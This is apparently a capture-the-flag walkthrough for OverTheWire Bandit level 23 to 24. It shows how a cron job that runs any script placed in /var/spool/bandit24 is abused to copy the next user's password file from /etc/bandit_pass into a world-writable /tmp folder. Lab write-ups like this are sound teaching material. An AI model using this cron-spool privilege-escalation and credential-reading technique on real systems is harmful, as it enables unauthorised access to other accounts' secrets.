Warning: This post contains a solution!
Only continue if:
1.) you want to see a possible alternative solution or
2.) you are stuck and need a hint!
Connect to the server using the following credentials:
Level Goal is:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Check the content of the folder /etc/cron.d/:
bandit23@bandit:~$ ls /etc/cron.d/ cronjob_bandit22 cronjob_bandit23 cronjob_bandit24
There are three files, the third one (cronjob_bandit24) is the interesting one for the current level. Take a look at the content:
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24 @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
A script (/usr/bin/cronjob_bandit24.sh) will be executed once on reboot and every minute.
Take a look at the content of the script:
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh #!/bin/bash myname=$(whoami) cd /var/spool/$myname echo "Executing and deleting all scripts in /var/spool/$myname:" for i in * .*; do if [ "$i" != "." -a "$i" != ".." ]; then echo "Handling $i" timeout -s 9 60 ./$i rm -f ./$i fi done
As mentioned in line seven, this script is executing all scripts available in the folder '/var/spool/$myname' → '/var/spool/bandit24' in our case. After executing a script, it deletes the script (line 14).
A temporary folder to save the flag to is needed, first create it and change chmod to 777 (lazy, I know):
bandit23@bandit:~$ mkdir /tmp/lvl2324 bandit23@bandit:~$ chmod 777 /tmp/lvl2324
Now, move to that temporary directory and create a short shell script, which writes the output of '/etc/bandit_pass/bandit24' to '/tmp/lvl2324/password':
#!/bin/bash cat /etc/bandit_pass/bandit24 > /tmp/lvl2324/password
Copy that shell script file to '/var/spool/bandit24':
bandit23@bandit:/tmp/lvl2324$ cp script.sh /var/spool/bandit24/
Wait until the shell script file in the folder is deleted and check the password file:
bandit23@bandit:/tmp/lvl2324$ cat password UoMYxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Don't forget to delete the temporary folder:
bandit23@bandit:~$ rm -rf /tmp/lvl2324